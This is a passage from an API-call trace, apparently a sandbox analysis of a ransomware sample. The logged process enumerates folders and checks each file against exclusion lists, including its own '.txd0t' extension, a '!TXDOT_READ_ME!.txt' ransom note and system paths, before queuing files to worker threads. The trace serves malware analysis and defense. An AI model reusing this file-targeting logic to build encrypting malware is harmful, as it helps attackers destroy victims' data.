(psz1=".", psz2=".") returned 0 [0085.298] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.298] StrCmpW (psz1="..", psz2=".") returned 1 [0085.298] StrCmpW (psz1="..", psz2="..") returned 0 [0085.298] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.298] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.298] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.298] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0085.298] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0085.298] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned="C:\\588bce7c90097ed212\\1028\\eula.rtf" [0085.298] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.298] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.298] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.298] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.298] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.299] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.299] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.299] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.299] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.299] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.299] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1028\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" [0085.299] SetEvent (hEvent=0x410) returned 1 [0085.301] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.301] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.301] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.301] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0085.301] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0085.301] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" [0085.301] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.302] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.302] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.302] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.302] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.303] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.303] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.304] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.304] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.314] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.315] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" [0085.315] SetEvent (hEvent=0x410) returned 1 [0085.315] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.315] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.315] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.315] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0085.315] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0085.315] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" [0085.315] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.315] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.315] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.315] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.315] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.315] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.315] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0085.315] GetProcessHeap () returned 0xe30000 [0085.315] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.315] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1029", cAlternateFileName="")) returned 1 [0085.315] StrCmpW (psz1="1029", psz2=".") returned 1 [0085.316] StrCmpW (psz1="1029", psz2="..") returned 1 [0085.316] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.316] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.316] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1029", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\system32\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\system\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\local\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\boot\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\perflogs\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\programdata\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\drivers\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\wsus\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="crypt_detect") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="cryptolocker") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="ransomware") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\WINDOWS") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.316] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\Program Files") returned 0x0 [0085.316] GetProcessHeap () returned 0xe30000 [0085.316] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.316] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0085.316] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\*") returned="C:\\588bce7c90097ed212\\1029\\*" [0085.316] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0085.317] StrCmpW (psz1=".", psz2=".") returned 0 [0085.317] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.317] StrCmpW (psz1="..", psz2=".") returned 1 [0085.317] StrCmpW (psz1="..", psz2="..") returned 0 [0085.317] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.317] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.317] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.317] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0085.317] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0085.317] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned="C:\\588bce7c90097ed212\\1029\\eula.rtf" [0085.317] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.317] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.317] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.317] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.317] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.317] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0085.432] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.432] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1029\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" [0085.432] SetEvent (hEvent=0x3fc) returned 1 [0085.432] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.432] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.432] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.432] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0085.433] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0085.433] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" [0085.433] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.433] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.433] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.433] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.433] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.433] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0085.441] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.441] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" [0085.441] SetEvent (hEvent=0x408) returned 1 [0085.442] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.442] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.442] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.442] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0085.442] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0085.442] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" [0085.442] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.442] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.442] StrCmpIW (psz1="SetupResources.dll", 